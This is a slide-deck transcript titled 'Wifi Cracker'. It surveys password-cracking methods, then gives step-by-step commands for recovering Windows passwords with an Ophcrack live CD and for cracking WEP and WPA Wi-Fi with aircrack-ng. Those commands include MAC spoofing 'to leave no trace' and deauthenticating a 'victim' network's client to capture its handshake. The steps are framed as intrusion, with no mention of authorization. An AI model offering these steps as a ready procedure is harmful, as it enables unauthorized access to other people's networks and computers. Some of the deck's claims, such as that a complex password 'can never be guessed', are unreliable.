+ All Categories
Home > Documents > Wifi Cracker

Wifi Cracker

Date post: 22-Jan-2016
Category:
Upload: dasan
View: 107 times
Download: 9 times
Share this document with a friend
Description:
Wifi Cracker. What Password Cracking. Password cracking is the process of recovering secret passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password. - PowerPoint PPT Presentation
41
Transcript
Page 1: Wifi Cracker
Page 2: Wifi Cracker

What Password CrackingPassword cracking is the process of

recovering secret passwords from data that has been stored in or transmitted by a computer system.

A common approach is to repeatedly try guesses for the password.

Most passwords can be cracked by using following techniques :

Page 3: Wifi Cracker

HashingHere we will refer to the one way function

(which may be either an encryption function or cryptographic hash) employed as a hash and its output as a hashed password.

Hash functions like SHA-512, SHA-1, and MD5 are considered impossible to invert when used correctly.

Page 4: Wifi Cracker

Guessing Many passwords can be guessed either by

humans or by sophisticated cracking programs armed with dictionaries (dictionary based) and the user's personal information.

Not surprisingly, many users choose weak passwords, usually one related to themselves in some way.

Repeated research over some 40 years has demonstrated that around 40% of user-chosen passwords are readily guessable by programs. Examples of insecure choices include:

Page 5: Wifi Cracker

Guessing blank (none)the word "password", "passcode", "admin" and

their derivativesthe user's name or login namethe name of their significant other or another

person (loved one)their birthplace or date of birtha pet's nameautomobile licence plate numbera row of letters from a standard keyboard layout

(eg, the qwerty keyboard -- qwerty itself, asdf, or qwertyuiop)

Page 6: Wifi Cracker

Guessing In one survey of MySpace passwords which

had been phished, 3.8 percent of passwords were a single word found in a dictionary, and another 12 percent were a word plus a final digit

A password containing both uppercase & lowercase characters, numbers and special characters too; is a strong password and can never be guessed.

Page 7: Wifi Cracker

Default Passwords A moderately high number of local and online

applications have inbuilt default passwords that have been configured by programmers during development stages of software.

A list containing default passwords of some of the most popular applications is available on the internet.

Always disable or change the applications' (both online and offline) default username-password pairs.

Page 8: Wifi Cracker

Brute Force If all other techniques failed, then attackers uses

brute force password cracking technique.

Here an automatic tool is used which tries all possible combinations of available keys on the keyboard.

This techniques takes extremely long time to complete, but password will surely cracked.

Longer is the password, large is the time taken to brute force it.

Page 9: Wifi Cracker

Phishing This is the most effective and easily executable

password cracking.

Phishing is a technique in which the attacker creates the fake login screen and send it to the victim, hoping that the victim gets fooled into entering the account username and password.

As soon as victim click on "enter" or "login" login button this information reaches to the attacker using scripts or online form.

Page 10: Wifi Cracker

RainBow TablesPasswords are normally stored in one-way hashes. When a password is created, the user types the

password in what is called "plain text", since it is in a plain, unhashed form.

However, after a password is made, the computer stores a one-way hash of the password that obfuscates it.

Hashes are made to be one-way, which means algorithmic reversal is impossible.

This means we have to crack those hashes!

Page 11: Wifi Cracker

PrincipleRainbow tables work on the principle of a

time-memory trade-off. This means that hashes are pre-generated by

a computer and stored in a large rainbow table file with all of the hashes and words that correspond to them.

Rainbow cracking can greatly reduce the amount of time it takes to crack a password hash, plus you can keep the tables, so you only have to generate them once!

Page 12: Wifi Cracker

Download & Install RainbowCrack

RainbowCrack is the tool that we are going to be using to generate and use rainbow tables.1. Download RainbowCrack.

tar zxvf <rainbowcrack>Change to the new directory that has been made

from extracting RainbowCrack. cd <new dir>4. Configure the installation. ./configure5. Now, compile the source code for

installation. make && sudo make install

Page 13: Wifi Cracker

Crack Windows

Page 14: Wifi Cracker

Crack WindowsLets get started....

Insert the Ophcrack Live CD and Boot your PC. Make sure the Boot from CD is the first option in the Boot menu at BIOS.

You'll get the Startup menu.

here choose Ophcrack Graphic mode – automatic

After few old loading shots, it'll redirect to the Linux Desktop. There Click on menu > Run

Page 15: Wifi Cracker

Crack Windows In the pop up box type > ophcrack click ok

Now you can see the ophcrack application windows. Here, click on Load > Encrypted SAM

After that we need to give the path to SAM directory which is by default /mnt/hda1/WINDOWS/System32 click choose

Here we can see the saved hashed now with the username and userid.

Now click on Crack button and wait for the password. Its quick and easy

That's it. It'll show the password now Have fun with the cracked password.

Note: Ophcrack is a live Linux CD, it may not work on all the versions of Windows 7 however its working fine with Windows XP/Vista.

Page 16: Wifi Cracker

Tools for WEP and WPA

Page 17: Wifi Cracker

airmon-ngairmon-ng stop (interface)ifconfig (interface) downmacchanger —mac 00:11:22:33:44:55 (interface)airmon-ng start (interface)

Page 18: Wifi Cracker

airodump-ng (interface)

Page 19: Wifi Cracker

airodump-ng -c (channel) -w (file name) —bssid (bssid) (interface)

Page 20: Wifi Cracker

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

Page 21: Wifi Cracker

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

Page 22: Wifi Cracker

aircrack-ng -b (bssid) (file name-01.cap)

Page 23: Wifi Cracker

Crack WPAStep 1:

Run this command to check available Wlan adapters.

airmon-ng

It should give you output something like below.

Now we know that we have only one wireless interface wlan0 lets proceed to step 2

Page 24: Wifi Cracker

Step 2:Now lets try to start the airmon service on

the interface that we have just .airmon-ng start wlan0

Page 25: Wifi Cracker

Crack WPA

Page 26: Wifi Cracker

Step 3:You should see another monitoring interface

mon0 on your system by using command ifconfig or you can the same command we did on Step 1

Here we can see the new monitoring interface mon0

Page 27: Wifi Cracker

Step 4:A good hacker is always suppose to leave no

trace back of his break-in.If you run the command ifconfig and notice

you will find that the monitoring interface mon0 and Wireless interface

Wlan0 are sharing the same MAC address. In actual mon0 is sharing the same mac address as Wlan0.

Page 28: Wifi Cracker
Page 29: Wifi Cracker

Now we have to put a fake mac address on the monitoring interface to leave no trace.

Lets make the mon0 interface down by running the command

ifconfig mon0 down

Next lets change the MAC address of mon0 interface by running the below command

macchanger –m 00:11:22:33:44:55 mon0

Page 30: Wifi Cracker
Page 31: Wifi Cracker

Now since we have changed the MAC address on MON0 lets bring the interface back up again using the below command

ifconfig mon0 up

Now just to be sure lets run the same command ‘ifconfig’ that we have already used earlier above in Ifconfig

Here we can see we have sucessfully changed the MAC address for our monitoring interface mon0

Page 32: Wifi Cracker
Page 33: Wifi Cracker

Step 5:Lets start dumping the available wireless

information. run the below command

airodump-ng mon0

Here my Victim router ESSID is AndroidHotSpot. The information we need from here is

BSSID MAC details: D0:C1: B1:5B:AC:33CHANNEL: 6

Page 34: Wifi Cracker
Page 35: Wifi Cracker

Step 6:By now we have identified our victim its time

to further narrow down this network. We need to know how many workstation/terminal connected to this wireless.

airodump-ng –c 6 –w crackwpa –bssid 02:1A:11:FE:A4:CE

Page 36: Wifi Cracker

We can see that one client having mac address highlighed in green is connected to this hotspot.

To find the password either you need to be patient to wait another client connect to this hotspot but time is money lets force this client to reconnect and make the handshake auth with the server so that we can take the packets

Note: Keep this ssh session close and open another terminal. Do not close the existing session

Page 37: Wifi Cracker
Page 38: Wifi Cracker

Step 7:Lets force the already connected session to

make a auth handshake again

Run the given below command in the new terminal session

aireplay-ng –0 –4 –a MAC-ADDR-OF-ROUTER –c MAC-ADDR-OF-CLIENT mon0

Page 39: Wifi Cracker
Page 40: Wifi Cracker

Final Step:Now finally we have all the dump saved in

the working directory we just need to crack the packet capture using dictionary file.

Run the below commandaircrack-ng crackwpa-01.cap –w list

crackwpa-01.cap is the filename of the capture packet

list if the my dictionary file name

Page 41: Wifi Cracker

Recommended